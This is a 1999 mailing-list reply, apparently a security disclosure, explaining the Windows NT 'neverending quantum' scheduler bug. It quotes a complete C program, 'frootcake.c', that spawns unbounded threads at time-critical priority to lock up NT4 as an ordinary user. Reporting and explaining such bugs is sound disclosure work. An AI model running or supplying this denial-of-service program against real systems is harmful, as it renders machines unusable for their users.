Re: ordinary users bringing NT to its knees [repost]

From: David Schwartz (davidsat_private)
Date: Thu Jun 10 1999 - 12:34:23 PDT


    	This is just an exploit for the 'neverending quantum' bug that's been known
    for ages; see http://www.sysinternals.com/tips.htm#NEQuantum for details. It
    has nothing to do with the number of threads running (except that you need
    at least one per CPU).
    
    	The bug occurs when a thread changes its priority. NT changes the thread's
    priority, but also gives it a new execution quantum. By repeating this
    process, a single thread never exhausts its quantum and can monopolize a CPU.
    
    	DS
    
    > Hi,
    >
    > Sorry if problems like this are already known, but I thought I'd post
    > this just in case...
    >
    > I was curious about how well NT could handle *lots* of threads, so I
    > wrote the following. It basically locks up the system, and I cannot kill
    > the process because I never get the Task Manager up. Pretty bad, since an
    > ordinary user can run it :/
    >
    > my system: 2xPPro with NT4 (SP5), 128megs RAM.
    >
    > cheers
    >
    > ----------------------------
    >
    > /*
    >  * frootcake.c
    >  * kivaat_private
    >  *
    >  * this tests NT at coping with *really dodgy* code...
    >  * it totally brings my SMP box to being unusable (SP5)
    >  */
    >
    > #include <windows.h>
    > #include <stdio.h>
    >
    > void poobah();
    >
    > DWORD WINAPI thread_func (LPVOID lpv)
    > {   /* Thread entry point; lpv is not used. Every thread that runs this
    >      * function starts one more thread on the same function, then loops
    >      * setting that child's priority to THREAD_PRIORITY_TIME_CRITICAL.
    >      * Returns 0, but only if the loop below ever ends and poobah()
    >      * returns. */
    >     DWORD id;
    >     HANDLE h;
    >     BOOL success = 1;
    >
    >     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); /* result is not checked and the handle is never closed in this function */
    >
    >     while (success){ /* ends only when a SetThreadPriority call returns 0 */
    >         switch (GetThreadPriority (h)){ /* all six cases below do exactly the same thing */
    >         case THREAD_PRIORITY_ABOVE_NORMAL:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         case THREAD_PRIORITY_BELOW_NORMAL:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         case THREAD_PRIORITY_HIGHEST:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         case THREAD_PRIORITY_IDLE:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         case THREAD_PRIORITY_LOWEST:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         case THREAD_PRIORITY_NORMAL:
    >             success = SetThreadPriority (h,
    > THREAD_PRIORITY_TIME_CRITICAL);
    >             break;
    >         } /* no case for TIME_CRITICAL and no default: any other value leaves success unchanged, so the loop just keeps polling */
    >     }
    >
    >     poobah(); /* reached only after the loop above has ended */
    >     return 0;
    > }
    >
    > void poobah()
    > {   /* Starts one thread on thread_func, sets its priority to
    >      * THREAD_PRIORITY_TIME_CRITICAL, then calls itself again
    >      * unconditionally. There is no base case, so neither the recursion
    >      * nor the thread creation is bounded by anything in this function. */
    >     DWORD id;
    >     HANDLE h;
    >
    >     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); /* result is not checked and the handle is never closed */
    >     SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); /* return value ignored */
    >
    >     poobah();
    > }
    >
    > int main ()
    > {   /* Prints a banner line and enters poobah(). */
    >     printf ("frootcake - kivaat_private\n");
    >     poobah();
    >     return 0; /* poobah() as posted always calls itself again, so no visible path returns here */
    > }
    >
    > /* eof */
    >
    


